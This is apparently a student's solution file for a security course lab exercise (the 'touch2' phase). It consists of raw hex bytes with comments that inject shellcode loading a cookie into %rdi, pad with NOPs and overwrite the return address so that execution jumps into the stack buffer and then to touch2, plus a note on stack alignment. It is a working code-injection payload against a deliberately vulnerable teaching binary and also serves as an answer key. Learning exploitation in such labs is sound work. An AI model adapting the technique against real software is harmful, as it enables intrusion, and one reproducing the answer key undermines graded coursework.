/* Overwritting caller's stack frame version */

48 c7 c7 fa 97 b9 59 90 /* mov $0x59b997fa,%rdi followed by a nop */
c3 90 90 90 90 90 90 90 /* ret follow by nops */
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 
90 90 90 90 90 90 90 90
78 dc 61 55 00 00 00 00 /* rsp-0x28 == buf[0] */
80 dc 61 55 00 00 00 00 /* addr of buf[7]  = rsp-0x28+0x8 -> addr of ret inside buffer */
ec 17 40 00 00 00 00 00 /* addr of touch2 */


/*
 
To align the stack, 
the last digit of the %rsp in hex should be '8' before addr of touch2 is popped 

*/
